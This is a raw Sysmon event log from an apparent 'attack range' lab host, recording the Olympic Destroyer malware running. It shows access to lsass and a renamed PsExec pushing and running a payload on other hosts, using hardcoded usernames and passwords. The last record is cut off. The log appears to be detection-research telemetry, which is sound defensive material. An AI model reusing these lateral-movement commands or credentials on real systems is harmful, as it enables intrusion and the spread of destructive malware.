10341000x8000000000000000291169Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.681{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12EE-6216-7F05-000000003802}208C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291168Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.681{C8EA50B7-12E6-6216-4B05-000000003802}67926872C:\Temp\olympic_destroyer.exe{C8EA50B7-12EE-6216-7F05-000000003802}208C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291167Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.684{C8EA50B7-12EE-6216-7F05-000000003802}208C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291166Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.681{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EE-6216-7F05-000000003802}208C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291165Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.665{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12EE-6216-7E05-000000003802}4000C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291164Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.644{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EE-6216-7E05-000000003802}4000C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291163Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.528{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12EE-6216-7D05-000000003802}6912C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291162Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.513{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291161Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.513{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291160Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.513{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291159Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.513{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291158Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.513{C8EA50B7-12E6-6216-4B05-000000003802}67926932C:\Temp\olympic_destroyer.exe{C8EA50B7-12EE-6216-7D05-000000003802}6912C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291157Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.525{C8EA50B7-12EE-6216-7D05-000000003802}6912C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-255.eu-central-1.compute.internal -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291156Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.513{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EE-6216-7D05-000000003802}6912C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291155Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.513{C8EA50B7-12EE-6216-7B05-000000003802}7160C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291154Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.497{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12EE-6216-7B05-000000003802}7160C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291153Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.497{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12EE-6216-7B05-000000003802}7160C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291152Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:46.481{C8EA50B7-12EE-6216-7B05-000000003802}7160C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291151Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.444{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12EE-6216-7C05-000000003802}7072C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291150Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.444{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12EE-6216-7C05-000000003802}7072C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291149Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.444{C8EA50B7-12EE-6216-7C05-000000003802}70727048C:\Windows\system32\conhost.exe{C8EA50B7-12EE-6216-7B05-000000003802}7160C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291148Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.413{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12EE-6216-7C05-000000003802}7072C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291147Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.413{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EE-6216-7C05-000000003802}7072C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291146Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.297{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12EE-6216-7B05-000000003802}7160C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291145Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.297{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291144Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.297{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291143Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.297{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291142Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.297{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291141Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.297{C8EA50B7-12E6-6216-4B05-000000003802}67926932C:\Temp\olympic_destroyer.exe{C8EA50B7-12EE-6216-7B05-000000003802}7160C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291140Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.299{C8EA50B7-12EE-6216-7B05-000000003802}7160C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291139Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.297{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EE-6216-7B05-000000003802}7160C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291138Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.281{C8EA50B7-12EE-6216-7905-000000003802}6880C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291137Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 